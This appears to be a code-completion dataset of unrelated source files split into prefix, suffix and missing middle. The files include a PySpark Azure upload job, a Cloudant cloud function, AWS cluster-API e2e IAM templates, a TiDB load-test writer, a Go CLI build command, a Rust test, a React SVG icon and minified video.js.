'prefix', 'userId', 'clusterId', 'clusterLatitude', 'clusterLongitude', 'geohash7', 'state')
dfs_destinations_distinct = dfs_destinations_distinct.drop_duplicates([
'prefix', 'userId', 'clusterId', 'clusterLatitude', 'clusterLongitude', 'geohash7'])
dfs_destinations_distinct.repartition("state").write.partitionBy(
"state").format('parquet').mode('overwrite').save(local_dir_distinct+"prefix="+prefix+"/")
dfs_destinations.unpersist()
print("upload local data to azure")
upload_time = time.time()
# upload parts 1 "prefix/state"
print(f"upload files for distinct")
# upload with threads
dfutures = []
with ThreadPoolExecutor(max_workers=THREADS) as executor:
fprefix = prefix
print(f"upload files for distinct: {fprefix}")
prefix_dir = local_dir_distinct+"prefix="+fprefix
prefix_key = f"prefix={fprefix}"
for state in US_STATES:
s_key = f"state={state}"
f_dir = prefix_dir + "/"+s_key
f_key = prefix_key + "/"+s_key
# print(f"read files for distinct from {f_dir}")
if (os.path.isdir(f_dir)):
files = [filename for filename in os.listdir(
f_dir) if filename.startswith("part-")]
if len(files) > 0:
for file_local in files:
file_path = f_dir+"/"+file_local
part_num = int(file_local.split('-')[1])
part_key = '{:05d}'.format(part_num)
# fix name as static hash to be reproducible
filename_hash = hashlib.sha1(
str.encode(f_key+f_key+part_key)).hexdigest()
blob_key = "{}/{}/part-{}-{}.snappy.parquet".format(
path_out_distinct, f_key, part_key, filename_hash)
# print("upload " + file_path + " to " + container_out+":"+blob_key)
# upload_blob(blob_service_client,container_out, blob_key, file_path)
future = executor.submit(
upload_blob, blob_service_client, container_out, blob_key, file_path)
dfutures.append(future)
# else:
# print(f"no files to upload for {f_key}")
# else:
# print(f"missing partition for {f_key}")
# end of loop, wait for futures
for future in dfutures:
bkey = future.result()
# ensure we wait all tasks
# TODO check if all done
ddone = concurrent.futures.wait(dfutures)
# upload parts 2 "prefix/parts"
print(f"upload files for all")
fprefix = prefix
# upload with threads
afutures = []
with ThreadPoolExecutor(max_workers=THREADS) as executor:
print(f"upload files for all: {fprefix}")
prefix_dir = local_dir_all+"prefix="+fprefix
prefix_key = f"prefix={fprefix}"
if (os.path.isdir(prefix_dir)):
files = [filename for filename in os.listdir(
prefix_dir) if filename.startswith("part-")]
if len(files) > 0:
for file_local in files:
file_path = prefix_dir+"/"+file_local
part_num = int(file_local.split('-')[1])
part_key = '{:05d}'.format(part_num)
# fix name as static hash to be reproducible
filename_hash = hashlib.sha1(
str.encode(prefix_key+part_key)).hexdigest()
blob_key = "{}/{}/part-{}-{}.snappy.parquet".format(
path_out_all, prefix_key, part_key, filename_hash)
# print("upload " + file_path + " to " + container_out+":"+blob_key)
# upload_blob(blob_service_client,container_out, blob_key, file_path)
future = executor.submit(
upload_blob, blob_service_client, container_out, blob_key, file_path)
afutures.append(future)
# else:
# print(f"no files to upload for {d_key}")
# else:
# print(f"missing partition for {d_key}")
# end of loop, wait for futures
for future in afutures:
bkey = future.result()
# ensure we wait all tasks
# TODO check if all done
adone = concurrent.futures.wait(afutures)
print("--- {} seconds elapsed ---".format(int(time.time() - start_time)))
print()
shutdown_time = time.time()
spark.stop()
end_time = time.time()
print("Done in {} seconds (read:{} spark:{} upload:{} shutdown:{})".format(
int(end_time - start_time),
int(spark_time - read_time),
int(upload_time - spark_time),
int(shutdown_time - upload_time),
int(end_time - shutdown_time)
))
print('Done.')
#
# END OF CODE
#
if __name__ == "__main__":
main()
| read_multiple_df |
main.py | #
#
# main() will be run when you invoke this action
#
# @param Cloud Functions actions accept a single parameter, which must be a JSON object.
#
# @return The output of this action, which must be a JSON object.
#
#
from cloudant.client import Cloudant
from cloudant.error import CloudantException
from cloudant.query import Query
from requests import ConnectionError, ReadTimeout, RequestException
import requests
import sys
def main(dict):
print(dict)
service = Cloudant.iam(None, dict["IAM_API_KEY"], url=dict["COUCH_URL"], connect=True)
db = service['reviews']
try:
selector = {'dealership': {'$eq':int(dict["dealerId"])}}
docs = db.get_query_result(selector)
reviews = []
for doc in docs:
reviews.append(doc)
return {"docs":reviews}
except CloudantException as ce:
print("Method failed")
print(" - status code: " + str(ce.code))
print(" - error message: " + ce.message)
except ConnectionError as cerr:
print("Connection error occurred:")
print(cerr)
except ReadTimeout as rt:
# The server did not send any data in the allotted amount of time.
print("Read timed out:")
print(rt)
except RequestException as re:
# Handle other request failures
print("Request Exception:")
print(re)
#add review
def main1(dict):
| print(dict)
service = Cloudant.iam(None, dict["IAM_API_KEY"], url=dict["COUCH_URL"], connect=True)
db = service['reviews']
try:
# Create a document using the Database API
my_document = db.create_document(dict["review"])
# Check that the document exists in the database
if my_document.exists():
return {"text": "Review successfully added."}
except ConnectionError as cerr:
print("Connection error occurred:")
print(cerr)
except ReadTimeout as rt:
# The server did not send any data in the allotted amount of time.
print("Read timed out:")
print(rt)
except RequestException as re:
# Handle other request failures
print("Request Exception:")
print(re) |
|
template.go | // +build e2e
/*
Copyright 2020 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package shared
import (
"context"
"io/ioutil"
"path"
"github.com/awslabs/goformation/v4/cloudformation"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
"gopkg.in/yaml.v2"
cfn_iam "github.com/awslabs/goformation/v4/cloudformation/iam"
"sigs.k8s.io/cluster-api-provider-aws/api/v1alpha4"
"sigs.k8s.io/cluster-api-provider-aws/cmd/clusterawsadm/api/bootstrap/v1alpha1"
cfn_bootstrap "sigs.k8s.io/cluster-api-provider-aws/cmd/clusterawsadm/cloudformation/bootstrap"
"sigs.k8s.io/cluster-api-provider-aws/cmd/clusterawsadm/credentials"
"sigs.k8s.io/cluster-api/test/framework"
"sigs.k8s.io/cluster-api/test/framework/clusterctl"
)
const (
MultiTenancyJumpPolicy = "CAPAMultiTenancyJumpPolicy"
)
var (
accountRef = cloudformation.Sub("arn:${AWS::Partition}:iam::${AWS::AccountId}:root")
)
// newBootstrapTemplate generates a clusterawsadm configuration, and prints it
// and the resultant cloudformation template to the artifacts directory
func newBootstrapTemplate(e2eCtx *E2EContext) *cfn_bootstrap.Template {
By("Creating a bootstrap AWSIAMConfiguration")
t := cfn_bootstrap.NewTemplate()
t.Spec.BootstrapUser.Enable = true
t.Spec.BootstrapUser.ExtraStatements = []v1alpha4.StatementEntry{
{
Effect: "Allow",
Action: []string{"sts:AssumeRole"},
Resource: []string{
cloudformation.GetAtt(MultiTenancySimpleRole.RoleName(), "Arn"),
cloudformation.GetAtt(MultiTenancyJumpRole.RoleName(), "Arn"),
},
},
}
t.Spec.SecureSecretsBackends = []v1alpha4.SecretBackend{
v1alpha4.SecretBackendSecretsManager,
v1alpha4.SecretBackendSSMParameterStore,
}
t.Spec.EventBridge = &v1alpha1.EventBridgeConfig{
Enable: true,
}
region, err := credentials.ResolveRegion("")
Expect(err).NotTo(HaveOccurred())
t.Spec.Region = region
t.Spec.EKS.Disable = false
t.Spec.EKS.AllowIAMRoleCreation = false
t.Spec.EKS.DefaultControlPlaneRole.Disable = false
t.Spec.EKS.ManagedMachinePool.Disable = false
str, err := yaml.Marshal(t.Spec)
Expect(err).NotTo(HaveOccurred())
Expect(ioutil.WriteFile(path.Join(e2eCtx.Settings.ArtifactFolder, "awsiamconfiguration.yaml"), str, 0644)).To(Succeed())
cloudformationTemplate := renderCustomCloudFormation(&t)
cfnData, err := cloudformationTemplate.YAML()
Expect(err).NotTo(HaveOccurred())
Expect(ioutil.WriteFile(path.Join(e2eCtx.Settings.ArtifactFolder, "cloudformation.yaml"), cfnData, 0644)).To(Succeed())
return &t
}
func | (t *cfn_bootstrap.Template) *cloudformation.Template {
cloudformationTemplate := t.RenderCloudFormation()
appendMultiTenancyRoles(t, cloudformationTemplate)
appendExtraPoliciesToBootstrapUser(t)
return cloudformationTemplate
}
func appendExtraPoliciesToBootstrapUser(t *cfn_bootstrap.Template) {
t.Spec.BootstrapUser.ExtraStatements = append(t.Spec.BootstrapUser.ExtraStatements, v1alpha4.StatementEntry{
Effect: v1alpha4.EffectAllow,
Resource: v1alpha4.Resources{
"*",
},
Action: v1alpha4.Actions{
"servicequotas:GetServiceQuota",
"servicequotas:RequestServiceQuotaIncrease",
"servicequotas:ListRequestedServiceQuotaChangeHistory",
"elasticloadbalancing:DescribeAccountLimits",
"ec2:DescribeAccountLimits",
"cloudtrail:LookupEvents",
"ssm:StartSession",
"ssm:DescribeSessions",
"ssm:GetConnectionStatus",
"ssm:DescribeInstanceProperties",
"ssm:GetDocument",
"ssm:TerminateSession",
"ssm:ResumeSession",
},
})
t.Spec.BootstrapUser.ExtraStatements = append(t.Spec.BootstrapUser.ExtraStatements, v1alpha4.StatementEntry{
Effect: v1alpha4.EffectAllow,
Resource: v1alpha4.Resources{
"arn:*:iam::*:role/aws-service-role/autoscaling.amazonaws.com/AWSServiceRoleForAutoScaling",
"arn:*:iam::*:role/aws-service-role/servicequotas.amazonaws.com/AWSServiceRoleForServiceQuotas",
"arn:*:iam::*:role/aws-service-role/support.amazonaws.com/AWSServiceRoleForSupport",
"arn:*:iam::*:role/aws-service-role/trustedadvisor.amazonaws.com/AWSServiceRoleForTrustedAdvisor",
},
Action: v1alpha4.Actions{
"iam:CreateServiceLinkedRole",
},
})
}
func appendMultiTenancyRoles(t *cfn_bootstrap.Template, cfnt *cloudformation.Template) {
controllersPolicy := cfnt.Resources[string(cfn_bootstrap.ControllersPolicy)].(*cfn_iam.ManagedPolicy)
controllersPolicy.Roles = append(
controllersPolicy.Roles,
cloudformation.Ref(MultiTenancySimpleRole.RoleName()),
cloudformation.Ref(MultiTenancyNestedRole.RoleName()),
)
cfnt.Resources[MultiTenancyJumpPolicy] = &cfn_iam.ManagedPolicy{
ManagedPolicyName: MultiTenancyJumpPolicy,
PolicyDocument: &v1alpha4.PolicyDocument{
Version: v1alpha4.CurrentVersion,
Statement: []v1alpha4.StatementEntry{
{
Effect: v1alpha4.EffectAllow,
Resource: v1alpha4.Resources{cloudformation.GetAtt(MultiTenancyNestedRole.RoleName(), "Arn")},
Action: v1alpha4.Actions{"sts:AssumeRole"},
},
},
},
Roles: []string{cloudformation.Ref(MultiTenancyJumpRole.RoleName())},
}
cfnt.Resources[MultiTenancySimpleRole.RoleName()] = &cfn_iam.Role{
RoleName: MultiTenancySimpleRole.RoleName(),
AssumeRolePolicyDocument: cfn_bootstrap.AssumeRolePolicy(v1alpha4.PrincipalAWS, []string{accountRef}),
}
cfnt.Resources[MultiTenancyJumpRole.RoleName()] = &cfn_iam.Role{
RoleName: MultiTenancyJumpRole.RoleName(),
AssumeRolePolicyDocument: cfn_bootstrap.AssumeRolePolicy(v1alpha4.PrincipalAWS, []string{accountRef}),
}
cfnt.Resources[MultiTenancyNestedRole.RoleName()] = &cfn_iam.Role{
RoleName: MultiTenancyNestedRole.RoleName(),
AssumeRolePolicyDocument: cfn_bootstrap.AssumeRolePolicy(v1alpha4.PrincipalAWS, []string{accountRef}),
}
}
// getBootstrapTemplate gets or generates a new bootstrap template
func getBootstrapTemplate(e2eCtx *E2EContext) *cfn_bootstrap.Template {
if e2eCtx.Environment.BootstrapTemplate == nil {
e2eCtx.Environment.BootstrapTemplate = newBootstrapTemplate(e2eCtx)
}
return e2eCtx.Environment.BootstrapTemplate
}
// ApplyTemplate will render a cluster template and apply it to the management cluster
func ApplyTemplate(ctx context.Context, configCluster clusterctl.ConfigClusterInput, clusterProxy framework.ClusterProxy) error {
Expect(ctx).NotTo(BeNil(), "ctx is required for ApplyClusterTemplateAndWait")
Byf("Getting the cluster template yaml")
workloadClusterTemplate := clusterctl.ConfigCluster(ctx, clusterctl.ConfigClusterInput{
KubeconfigPath: configCluster.KubeconfigPath,
ClusterctlConfigPath: configCluster.ClusterctlConfigPath,
Flavor: configCluster.Flavor,
Namespace: configCluster.Namespace,
ClusterName: configCluster.ClusterName,
KubernetesVersion: configCluster.KubernetesVersion,
ControlPlaneMachineCount: configCluster.ControlPlaneMachineCount,
WorkerMachineCount: configCluster.WorkerMachineCount,
InfrastructureProvider: configCluster.InfrastructureProvider,
LogFolder: configCluster.LogFolder,
})
Expect(workloadClusterTemplate).ToNot(BeNil(), "Failed to get the cluster template")
Byf("Applying the %s cluster template yaml to the cluster", configCluster.Flavor)
return clusterProxy.Apply(ctx, workloadClusterTemplate)
}
| renderCustomCloudFormation |
blockwriter.go | // Copyright 2019 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// See the License for the specific language governing permissions and
// limitations under the License.package spec
package blockwriter
import (
"context"
"database/sql"
"fmt"
"math/rand"
"strings"
"sync"
"sync/atomic"
"time"
"github.com/golang/glog"
"github.com/pingcap/tidb-operator/tests/pkg/util"
"k8s.io/apimachinery/pkg/util/wait"
)
const (
queryChanSize int = 10000
)
// BlockWriterCase is for concurrent writing blocks.
type BlockWriterCase struct {
cfg Config
bws []*blockWriter
isRunning uint32
isInit uint32
stopChan chan struct{}
sync.RWMutex
}
// Config defines the config of BlockWriterCase
type Config struct {
TableNum int
Concurrency int
BatchSize int
RawSize int
}
type blockWriter struct {
rawSize int
values []string
batchSize int
}
// NewBlockWriterCase returns the BlockWriterCase.
func | (cfg Config) *BlockWriterCase {
c := &BlockWriterCase{
cfg: cfg,
stopChan: make(chan struct{}, 1),
}
if c.cfg.TableNum < 1 {
c.cfg.TableNum = 1
}
c.initBlocks()
return c
}
func (c *BlockWriterCase) initBlocks() {
c.bws = make([]*blockWriter, c.cfg.Concurrency)
for i := 0; i < c.cfg.Concurrency; i++ {
c.bws[i] = c.newBlockWriter()
}
}
func (c *BlockWriterCase) newBlockWriter() *blockWriter {
return &blockWriter{
rawSize: c.cfg.RawSize,
values: make([]string, c.cfg.BatchSize),
batchSize: c.cfg.BatchSize,
}
}
func (c *BlockWriterCase) generateQuery(ctx context.Context, queryChan chan []string, wg *sync.WaitGroup) {
defer func() {
glog.Infof("[%s] [action: generate Query] stopped", c)
wg.Done()
}()
for {
tableN := rand.Intn(c.cfg.TableNum)
var index string
if tableN > 0 {
index = fmt.Sprintf("%d", tableN)
}
var querys []string
for i := 0; i < 100; i++ {
values := make([]string, c.cfg.BatchSize)
for i := 0; i < c.cfg.BatchSize; i++ {
blockData := util.RandString(c.cfg.RawSize)
values[i] = fmt.Sprintf("('%s')", blockData)
}
querys = append(querys, fmt.Sprintf(
"INSERT INTO block_writer%s(raw_bytes) VALUES %s",
index, strings.Join(values, ",")))
}
select {
case <-ctx.Done():
return
default:
if len(queryChan) < queryChanSize {
queryChan <- querys
} else {
glog.Infof("[%s] [action: generate Query] query channel is full, sleep 10 seconds", c)
util.Sleep(ctx, 10*time.Second)
}
}
}
}
func (bw *blockWriter) batchExecute(db *sql.DB, query string) error {
_, err := db.Exec(query)
if err != nil {
glog.V(4).Infof("[block_writer] exec sql [%s] failed, err: %v", query, err)
return err
}
return nil
}
func (bw *blockWriter) run(ctx context.Context, db *sql.DB, queryChan chan []string) {
for {
select {
case <-ctx.Done():
return
default:
}
querys, ok := <-queryChan
if !ok {
// No more query
return
}
for _, query := range querys {
select {
case <-ctx.Done():
return
default:
if err := bw.batchExecute(db, query); err != nil {
glog.Error(err)
time.Sleep(5 * time.Second)
continue
}
}
}
}
}
// Initialize inits case
func (c *BlockWriterCase) initialize(db *sql.DB) error {
glog.Infof("[%s] start to init...", c)
defer func() {
atomic.StoreUint32(&c.isInit, 1)
glog.Infof("[%s] init end...", c)
}()
for i := 0; i < c.cfg.TableNum; i++ {
var s string
if i > 0 {
s = fmt.Sprintf("%d", i)
}
tmt := fmt.Sprintf("CREATE TABLE IF NOT EXISTS block_writer%s %s", s, `
(
id BIGINT NOT NULL AUTO_INCREMENT,
raw_bytes BLOB NOT NULL,
PRIMARY KEY (id)
)`)
err := wait.PollImmediate(5*time.Second, 30*time.Second, func() (bool, error) {
_, err := db.Exec(tmt)
if err != nil {
glog.Warningf("[%s] exec sql [%s] failed, err: %v, retry...", c, tmt, err)
return false, nil
}
return true, nil
})
if err != nil {
glog.Errorf("[%s] exec sql [%s] failed, err: %v", c, tmt, err)
return err
}
}
return nil
}
// Start starts to run cases
func (c *BlockWriterCase) Start(db *sql.DB) error {
if !atomic.CompareAndSwapUint32(&c.isRunning, 0, 1) {
err := fmt.Errorf("[%s] is running, you can't start it again", c)
glog.Error(err)
return nil
}
defer func() {
c.RLock()
glog.Infof("[%s] stopped", c)
atomic.SwapUint32(&c.isRunning, 0)
}()
if c.isInit == 0 {
if err := c.initialize(db); err != nil {
return err
}
}
glog.Infof("[%s] start to execute case...", c)
var wg sync.WaitGroup
ctx, cancel := context.WithCancel(context.Background())
queryChan := make(chan []string, queryChanSize)
for i := 0; i < c.cfg.Concurrency; i++ {
wg.Add(1)
go func(i int) {
defer wg.Done()
c.bws[i].run(ctx, db, queryChan)
}(i)
}
wg.Add(1)
go c.generateQuery(ctx, queryChan, &wg)
loop:
for {
select {
case <-c.stopChan:
glog.Infof("[%s] stoping...", c)
cancel()
break loop
default:
util.Sleep(context.Background(), 2*time.Second)
}
}
wg.Wait()
close(queryChan)
return nil
}
// Stop stops cases
func (c *BlockWriterCase) Stop() {
c.stopChan <- struct{}{}
}
// String implements fmt.Stringer interface.
func (c *BlockWriterCase) String() string {
return "block_writer"
}
| NewBlockWriterCase |
EventField.ts | export interface EventField {
readonly title: string
readonly value: string
} |
||
build.go | package cmd
import (
"context"
"fmt"
"os"
"github.com/testground/testground/pkg/api"
"github.com/testground/testground/pkg/client"
"github.com/testground/testground/pkg/logging"
"github.com/BurntSushi/toml"
"github.com/urfave/cli/v2"
)
var BuildCommand = cli.Command{
Name: "build",
Usage: "request the daemon to build a test plan",
Subcommands: cli.Commands{
&cli.Command{
Name: "composition",
Aliases: []string{"c"},
Usage: "builds a composition.",
Action: buildCompositionCmd,
Flags: []cli.Flag{
&cli.StringFlag{
Name: "file",
Aliases: []string{"f"},
Usage: "path to a `COMPOSITION`",
Required: true,
},
&cli.BoolFlag{
Name: "write-artifacts",
Aliases: []string{"w"},
Usage: "write the resulting build artifacts to the composition file",
},
&cli.StringFlag{
Name: "link-sdk",
Usage: "link the test plan against a local SDK; `SDK_NAME` can be a full path, or a directory under $TESTGROUND_HOME/sdks",
},
},
},
&cli.Command{
Name: "single",
Aliases: []string{"s"},
Usage: "builds a single group, passing in all necessary input via CLI flags.",
Action: buildSingleCmd,
Flags: cli.FlagsByName{
&cli.StringSliceFlag{
Name: "build-cfg",
Usage: "set a build config parameter",
},
&cli.StringFlag{
Name: "builder",
Aliases: []string{"b"},
Usage: "specifies the builder to use; values include: 'docker:go', 'exec:go'",
Required: true,
},
&cli.StringSliceFlag{
Name: "dep",
Aliases: []string{"d"},
Usage: "set a dependency mapping",
},
&cli.StringFlag{
Name: "link-sdk",
Usage: "links the test plan against a local SDK. The full `DIR_PATH`, or the `NAME` can be supplied," +
"In the latter case, the testground client will expect to find the SDK under $TESTGROUND_HOME/sdks/NAME",
},
&cli.StringFlag{
Name: "plan",
Aliases: []string{"p"},
Usage: "specifies the plan to run",
Required: true,
},
},
},
},
}
func buildCompositionCmd(c *cli.Context) (err error) {
comp := new(api.Composition)
file := c.String("file")
if file == "" {
return fmt.Errorf("no composition file supplied")
}
if _, err = toml.DecodeFile(file, comp); err != nil {
return fmt.Errorf("failed to process composition file: %w", err)
}
if err = comp.ValidateForBuild(); err != nil {
return fmt.Errorf("invalid composition file: %w", err)
}
_, err = doBuild(c, comp)
if err != nil {
return err
}
if c.Bool("write-artifacts") {
f, err := os.OpenFile(file, os.O_WRONLY, 0644)
if err != nil {
return fmt.Errorf("failed to write composition to file: %w", err)
}
enc := toml.NewEncoder(f)
if err := enc.Encode(comp); err != nil {
return fmt.Errorf("failed to encode composition into file: %w", err)
}
}
return nil
}
func buildSingleCmd(c *cli.Context) (err error) {
var comp *api.Composition
if comp, err = createSingletonComposition(c); err != nil {
return err
}
_, err = doBuild(c, comp)
return err
}
func | (c *cli.Context, comp *api.Composition) ([]api.BuildOutput, error) {
var (
plan = comp.Global.Plan
planDir string
sdkDir string
)
ctx, cancel := context.WithCancel(ProcessContext())
defer cancel()
cl, cfg, err := setupClient(c)
if err != nil {
return nil, err
}
// Resolve the linked SDK directory, if one has been supplied.
if sdk := c.String("link-sdk"); sdk != "" {
var err error
sdkDir, err = resolveSDK(cfg, sdk)
if err != nil {
return nil, fmt.Errorf("failed to resolve linked SDK directory: %w", err)
}
logging.S().Infof("linking with sdk at: %s", sdkDir)
}
// Resolve the test plan and its manifest.
var manifest *api.TestPlanManifest
planDir, manifest, err = resolveTestPlan(cfg, plan)
if err != nil {
return nil, fmt.Errorf("failed to resolve test plan: %w", err)
}
logging.S().Infof("test plan source at: %s", planDir)
comp, err = comp.PrepareForBuild(manifest)
if err != nil {
return nil, err
}
req := &api.BuildRequest{Composition: *comp}
resp, err := cl.Build(ctx, req, planDir, sdkDir)
if err != nil {
return nil, err
}
defer resp.Close()
res, err := client.ParseBuildResponse(resp)
switch err {
case nil:
case context.Canceled:
return nil, fmt.Errorf("interrupted")
default:
return nil, err
}
for i, out := range res {
g := &comp.Groups[i]
logging.S().Infow("generated build artifact", "group", g.ID, "artifact", out.ArtifactPath)
g.Run.Artifact = out.ArtifactPath
}
return res, nil
}
| doBuild |
deriving-span-Eq-enum.rs | // Copyright 2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or | // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// This file was auto-generated using 'src/etc/generate-keyword-span-tests.py'
#[feature(struct_variant)];
extern crate rand;
struct Error;
#[deriving(Eq)]
enum Enum {
A(
Error //~ ERROR
//~^ ERROR
)
}
fn main() {} | |
svgIcon.js | import React from "react"
const SVGIcon = () => (
<svg
version="1.1"
xmlns="http://www.w3.org/2000/svg"
viewBox="0 0 288 288"
x="0px"
y="0px"
>
<g>
<g id="letter_group" transform="scale(1)">
<g>
<g id="Calque_27"></g>
<g id="Calque_26"></g>
<g id="Calque_25"></g>
<g id="Calque_24"></g>
<g id="Calque_23"></g>
<g id="Calque_22">
<g>
<path
d="M109.4,0.9C100,1.4,91,3.1,82.7,5.5L55.2,81C52.1,73.4,38,38.8,35.7,33.2C-22.6,89.8-4.6,187.3,69.2,219.9v-24.7 c-41-23.7-57-74-38.7-116.4c3.6,8.9,19.4,47.5,22.3,54.6h6.8c8.3-22.7,18.2-50.1,27.9-76.6c0,116.5,0,48,0,169.3 c7.1,1.8,14.4,2.9,22,3.3c0,0,0,0,0,0L109.4,0.9z"
transform="translate(28.65176319999999 28.799999999999997)"
id="icon"
/>
</g>
</g>
<g id="Calque_21"></g>
<g id="Calque_20"></g>
<g id="Calque_19"></g>
<g id="Calque_18"></g>
<g id="Calque_17"></g>
<g id="Calque_16"></g>
<g id="Calque_15"></g>
<g id="Calque_14"></g>
<g id="Calque_13"></g>
<g id="Calque_12"></g>
<g id="Calque_11"></g>
<g id="Calque_10"></g>
<g id="Calque_9"></g>
<g id="Calque_8"></g>
<g id="Calque_7"></g>
<g id="Calque_6"></g>
<g id="Calque_5"></g>
<g id="Calque_4"></g>
<g id="Calque_3"></g>
<g id="Calque_2"></g>
</g>
<g>
<g id="Calque_27"></g>
<g id="Calque_26"></g>
<g id="Calque_25"></g>
<g id="Calque_24"></g>
<g id="Calque_23"></g>
<g id="Calque_22"></g>
<g id="Calque_21"></g>
<g id="Calque_20"></g>
<g id="Calque_19"></g>
<g id="Calque_18"></g>
<g id="Calque_17"></g>
<g id="Calque_16"></g>
<g id="Calque_15"></g>
<g id="Calque_14"></g>
<g id="Calque_13"></g> | <g id="Calque_9">
<path
d="M82.4,88.1h22.8C93.4,39.5,50.9,3.7,0.2,0.9c-0.1,0-0.1,0-0.2,0c0,0,0,0,0,0v228.5c0,0,0,0,0,0c0.1,0,0.1,0,0.2,0 c7.5-0.4,14.8-1.5,21.8-3.3v-92.8h43.6v-22H22V27.1C50.8,36.3,73.5,59.2,82.4,88.1z"
transform="translate(149.94823680000002 28.799999999999997)"
path="icon"
/>
</g>
<g id="Calque_8"></g>
<g id="Calque_7"></g>
<g id="Calque_6"></g>
<g id="Calque_5"></g>
<g id="Calque_4"></g>
<g id="Calque_3"></g>
<g id="Calque_2"></g>
</g>
</g>
</g>
</svg>
)
export default SVGIcon | <g id="Calque_12"></g>
<g id="Calque_11"></g>
<g id="Calque_10"></g> |
video.min.js | /**
* @license
* Video.js 5.0.0-rc.32 <http://videojs.com/>
* Copyright Brightcove, Inc. <https://www.brightcove.com/>
* Available under Apache License Version 2.0
* <https://github.com/videojs/video.js/blob/master/LICENSE>
*
* Includes vtt.js <https://github.com/mozilla/vtt.js>
* Available under Apache License Version 2.0
* <https://github.com/mozilla/vtt.js/blob/master/LICENSE>
*/
!function(a){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=a();else if("function"==typeof define&&define.amd)define([],a);else{var b;b="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this,b.videojs=a()}}(function(){var a;return function b(a,c,d){function e(g,h){if(!c[g]){if(!a[g]){var i="function"==typeof require&&require;if(!h&&i)return i(g,!0);if(f)return f(g,!0);var j=new Error("Cannot find module '"+g+"'");throw j.code="MODULE_NOT_FOUND",j}var k=c[g]={exports:{}};a[g][0].call(k.exports,function(b){var c=a[g][1][b];return e(c?c:b)},k,k.exports,b,a,c,d)}return c[g].exports}for(var f="function"==typeof require&&require,g=0;g<d.length;g++)e(d[g]);return e}({1:[function(a,b){(function(c){var d="undefined"!=typeof c?c:"undefined"!=typeof window?window:{},e=a("min-document");if("undefined"!=typeof document)b.exports=document;else{var f=d["__GLOBAL_DOCUMENT_CACHE@4"];f||(f=d["__GLOBAL_DOCUMENT_CACHE@4"]=e),b.exports=f}}).call(this,"undefined"!=typeof global?global:"undefined"!=typeof self?self:"undefined"!=typeof window?window:{})},{"min-document":3}],2:[function(a,b){(function(a){b.exports="undefined"!=typeof window?window:"undefined"!=typeof a?a:"undefined"!=typeof self?self:{}}).call(this,"undefined"!=typeof global?global:"undefined"!=typeof self?self:"undefined"!=typeof window?window:{})},{}],3:[function(){},{}],4:[function(a,b){function c(a,b){if("function"!=typeof a)throw new TypeError(d);return b=e(void 0===b?a.length-1:+b||0,0),function(){for(var c=arguments,d=-1,f=e(c.length-b,0),g=Array(f);++d<f;)g[d]=c[b+d];switch(b){case 0:return a.call(this,g);case 1:return a.call(this,c[0],g);case 2:return a.call(this,c[0],c[1],g)}var h=Array(b+1);for(d=-1;++d<b;)h[d]=c[d];return h[b]=g,a.apply(this,h)}}var d="Expected a function",e=Math.max;b.exports=c},{}],5:[function(a,b){function c(a,b){var c=-1,d=a.length;for(b||(b=Array(d));++c<d;)b[c]=a[c];return b}b.exports=c},{}],6:[function(a,b){function c(a,b){for(var c=-1,d=a.length;++c<d&&b(a[c],c,a)!==!1;);return a}b.exports=c},{}],7:[function(a,b){function c(a,b,c){c||(c={});for(var d=-1,e=b.length;++d<e;){var f=b[d];c[f]=a[f]}return c}b.exports=c},{}],8:[function(a,b){var c=a("./createBaseFor"),d=c();b.exports=d},{"./createBaseFor":17}],9:[function(a,b){function c(a,b){return d(a,b,e)}var d=a("./baseFor"),e=a("../object/keysIn");b.exports=c},{"../object/keysIn":39,"./baseFor":8}],10:[function(a,b){function c(a){return"function"==typeof a||!1}b.exports=c},{}],11:[function(a,b){function c(a,b,l,m,n){if(!h(a))return a;var o=g(b)&&(f(b)||j(b)),p=o?null:k(b);return d(p||b,function(d,f){if(p&&(f=d,d=b[f]),i(d))m||(m=[]),n||(n=[]),e(a,b,f,c,l,m,n);else{var g=a[f],h=l?l(g,d,f,a,b):void 0,j=void 0===h;j&&(h=d),void 0===h&&(!o||f in a)||!j&&(h===h?h===g:g!==g)||(a[f]=h)}}),a}var d=a("./arrayEach"),e=a("./baseMergeDeep"),f=a("../lang/isArray"),g=a("./isArrayLike"),h=a("../lang/isObject"),i=a("./isObjectLike"),j=a("../lang/isTypedArray"),k=a("../object/keys");b.exports=c},{"../lang/isArray":30,"../lang/isObject":33,"../lang/isTypedArray":36,"../object/keys":38,"./arrayEach":6,"./baseMergeDeep":12,"./isArrayLike":20,"./isObjectLike":25}],12:[function(a,b){function c(a,b,c,k,l,m,n){for(var o=m.length,p=b[c];o--;)if(m[o]==p)return void(a[c]=n[o]);var q=a[c],r=l?l(q,p,c,a,b):void 0,s=void 0===r;s&&(r=p,g(p)&&(f(p)||i(p))?r=f(q)?q:g(q)?d(q):[]:h(p)||e(p)?r=e(q)?j(q):h(q)?q:{}:s=!1),m.push(p),n.push(r),s?a[c]=k(r,p,l,m,n):(r===r?r!==q:q===q)&&(a[c]=r)}var d=a("./arrayCopy"),e=a("../lang/isArguments"),f=a("../lang/isArray"),g=a("./isArrayLike"),h=a("../lang/isPlainObject"),i=a("../lang/isTypedArray"),j=a("../lang/toPlainObject");b.exports=c},{"../lang/isArguments":29,"../lang/isArray":30,"../lang/isPlainObject":34,"../lang/isTypedArray":36,"../lang/toPlainObject":37,"./arrayCopy":5,"./isArrayLike":20}],13:[function(a,b){function c(a){return function(b){return null==b?void 